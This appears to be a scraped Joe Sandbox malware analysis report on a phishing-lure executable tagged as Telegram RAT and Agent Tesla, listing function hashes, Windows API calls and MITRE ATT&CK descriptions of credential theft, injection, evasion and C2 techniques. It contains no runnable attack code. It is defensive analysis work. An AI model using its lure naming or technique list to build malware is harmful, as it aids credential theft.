Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 389bcb8bd60da9926fc4cf42b3fa0b15a74dbe0192c701b6d94f1c78af7c38b6
Instruction ID: a6e5bfcda62c81cd4a8dfc943b3295a056803fa630afa5e74d8710af5b83f317
Opcode Fuzzy Hash: 389bcb8bd60da9926fc4cf42b3fa0b15a74dbe0192c701b6d94f1c78af7c38b6
Instruction Fuzzy Hash: A731E1B1D106589FCB10CFA9C984ACEFBF5BF48310F55802AE829AB350D7749945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A102D50 Relevance: 1.6, APIs: 1, Instructions: 85
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0A102DF1

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a2e341e35c4a762f6a52b24bc733d576fabf29c93d63546f7f122e88eb53d32
Instruction ID: bb6a2749e57bd4db2abb40f220f9382b348476745226e03e59a68e2a7af97656
Opcode Fuzzy Hash: 2a2e341e35c4a762f6a52b24bc733d576fabf29c93d63546f7f122e88eb53d32
Instruction Fuzzy Hash: EB31BC30A013489FDB55DF78D849BEEBBB2EF85304F11846AD005EB2A5CB76984ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0A103808 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0A1038BC

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 82ec04c419919c4fa9630e030d8ff4311435e554d691992b551799d3bc9689a9
Instruction ID: 81cd14dbeb50af544091ddf99ec0f298c59d91f56e4e0ac123a3d0739e671730
Opcode Fuzzy Hash: 82ec04c419919c4fa9630e030d8ff4311435e554d691992b551799d3bc9689a9
Instruction Fuzzy Hash: A231F2B0D002898FDB10CF99C584A8EFFF5BF48304F29816AE419AB344C7B59945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0A10D19C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0A10D6E6,?,?,?,?,?), ref: 0A10D7A7

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e2f3a2c3b5359f11b83b298f9e0fc3a587472d291e9c804f70bd9c5533e3f294
Instruction ID: 1728e5b95911a4802eb2cea8a6d3d1dfb6b6a0717bfded057ab67a54bc60f423
Opcode Fuzzy Hash: e2f3a2c3b5359f11b83b298f9e0fc3a587472d291e9c804f70bd9c5533e3f294
Instruction Fuzzy Hash: A12114B5900248EFCB10CFA9D584AEEBFF4EB48324F14801AE955B3350C378A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 008D4CBB Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 008D4D42

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: ed702f999146536727676735dec4b2534d4fc5f3c89ad67c1a726e00c9c9f37b
Instruction ID: a1299246de5c11df90c5aa2286663e4529830e11077f73d388a03660e27654c8
Opcode Fuzzy Hash: ed702f999146536727676735dec4b2534d4fc5f3c89ad67c1a726e00c9c9f37b
Instruction Fuzzy Hash: A22186B58007858FCB50DFAAD54939EBBF4FB45314F24812AD84AE7601C778984ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A1069C8 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A1083F2), ref: 0A1084DF

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4167c2dc5ac76028b404f1b436310c6e84ecd1278aab313a65659362fe8ae525
Instruction ID: e988b1e0b9ddaf02b45c124112f87d2ddad94e0a3b05d3ec8540ceb52d9b2edd
Opcode Fuzzy Hash: 4167c2dc5ac76028b404f1b436310c6e84ecd1278aab313a65659362fe8ae525
Instruction Fuzzy Hash: F31133B1C046599BCB10CFAAC544BDEFBF4AB48324F05816AD814B7240D378A944CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 0A108471 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A1083F2), ref: 0A1084DF

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 65f75ff794afea7d9ab830d5b76c20b4a53c6fd69c92526a9beefedd064b2e6d
Instruction ID: 55c2525a36e6a627e620e88cc75689f82916127deafd6a458fc415f316239c0b
Opcode Fuzzy Hash: 65f75ff794afea7d9ab830d5b76c20b4a53c6fd69c92526a9beefedd064b2e6d
Instruction Fuzzy Hash: 991133B1C0065A9FCB10CFA9D544BDEFBF4AF88324F15812AD814B3240D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 008D4CC8 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 008D4D42

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f73f7ea9a29c35fc9fc0ce19443fd9f5bbd4d7dc108d4e1055c4523359dd966c
Instruction ID: c08498be4fd63749d10b51c0e765ad040500a9eb047052d65b3a8701d7813f29
Opcode Fuzzy Hash: f73f7ea9a29c35fc9fc0ce19443fd9f5bbd4d7dc108d4e1055c4523359dd966c
Instruction Fuzzy Hash: E211BBB19007498FCB50EFAAD54979EBBF4FB48314F20802AD909E3700C778A849CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0087DA00 Relevance: 1.1, Instructions: 1063COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636218573.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_87d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ba0d7636b2312f82464158ced490cc24ae13ad9e1b089d4087086c7f0515280
Instruction ID: 5331bfee13c7976f5428a8f13f87584d0b25853b1538fbedc32608da626ac27c
Opcode Fuzzy Hash: 4ba0d7636b2312f82464158ced490cc24ae13ad9e1b089d4087086c7f0515280
Instruction Fuzzy Hash: 2252142165F7C09FE323A3388874AA5BF718E03129B1D48DFD4C5CE8A7D50A651AC7A7

Uniqueness

Uniqueness Score: -1.00%

Function 0086D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_86d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31da694ed01aef63edb42f378c673d9f7ec921043cadd479d1bbef6d145761ab
Instruction ID: 09a0c0154b3862b371f857b6e6883d0beba5ade23e84cb5083b5a75d6b45bee8
Opcode Fuzzy Hash: 31da694ed01aef63edb42f378c673d9f7ec921043cadd479d1bbef6d145761ab
Instruction Fuzzy Hash: C2216AB1A04344DFCB00CF00D8C4F1ABF65FB88328F258569E9068B646C336DC45D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0086D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_86d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6afd93516c9b28bdc7ce1497ccf2eff59c9bd7919d90f5dd0f176f75f9293ee
Instruction ID: e112d28fc6bbba545a286b0adbf5bd12b4b9d42ce0d022861bcb8f8b94925bf5
Opcode Fuzzy Hash: c6afd93516c9b28bdc7ce1497ccf2eff59c9bd7919d90f5dd0f176f75f9293ee
Instruction Fuzzy Hash: 58213AB1A04344DFDB00DF10D8C0B2ABF65FB98324F25C669E9098B246C736EC46D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0087E3F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636218573.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_87d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee69563bb2b72af04509409650011237add7c3a26bd2bfd71eae2665e859a2f
Instruction ID: 71c5fd92693fafea292d4b691a5e7496256e41f88945876e14be8f69fa32edff
Opcode Fuzzy Hash: cee69563bb2b72af04509409650011237add7c3a26bd2bfd71eae2665e859a2f
Instruction Fuzzy Hash: B22149B1604644EFCB10CF10D8C4B26BB61FB88318F24C9A9D94D8B34AC33AD806DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0086D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_86d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction ID: 0331508a333e0356718ec5bad5e901e300bbdaae51fd978f6f1d8f5052ae4616
Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction Fuzzy Hash: 4D11D376904384CFCB11CF10D5C4B16BF71FB98324F28C6A9D8064B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0086D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_86d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction ID: 216d585fa98f29c5b875dd20d994a815c848d07c5a25724d829cf12b4ea2b11a
Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction Fuzzy Hash: AD11D376904384DFCB11CF10D5C4B16BF72FB94320F28C6A9D8084B656C33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0A108780 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9ee46d17629d0c90814ba04aeb14155de9d77af0946cab3e9709fb9de9448e
Instruction ID: b9ed9ab747da5929ac3574055574addbbbdd4d3c951d1a0790fe511380f543ad
Opcode Fuzzy Hash: ea9ee46d17629d0c90814ba04aeb14155de9d77af0946cab3e9709fb9de9448e
Instruction Fuzzy Hash: 94C1E470B1C219CFDF285F6989066BDBAB6BFC8710F1A8429D482E66D4CF748841DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008D02C2 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720b211f074c436bf21536ab7835095f030e540c336126f612de04182abc2628
Instruction ID: db18f52b6097c011fb76759c7903b111691d8216ff3283cacb33d19623e0384e
Opcode Fuzzy Hash: 720b211f074c436bf21536ab7835095f030e540c336126f612de04182abc2628
Instruction Fuzzy Hash: 0D212A83C41E5887EF4526FB0CA43CE1381EB7BB79F409759C339803E1B94515878627

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Dhl recent package delivery report needs attention.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dhl recent package delivery report needs attention.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Dhl recent package delivery report needs attention.exe

Function 049EEF28 Relevance: 1.8, APIs: 1, Instructions: 261
processCOMMON

Function 049EB300 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Function 049EB310 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Function 049EB5F8 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 049EB530 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 049EF5B0 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Function 049EB538 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 049EF358 Relevance: 1.6, APIs: 1, Instructions: 58
threadinjectionCOMMON

Function 049EF418 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 049EF508 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Function 049EF718 Relevance: 1.5, APIs: 1, Instructions: 43
threadCOMMON

Function 0A104BC8 Relevance: 6.1, Strings: 4, Instructions: 1108
COMMON

Function 0A102DB0 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Function 0A10D4F8 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Function 0A1083A0 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Function 008DC8E4 Relevance: 1.6, APIs: 1, Instructions: 91
libraryCOMMON

Function 008D9C5C Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Function 0A103EC0 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Function 0A102D50 Relevance: 1.6, APIs: 1, Instructions: 85
libraryCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre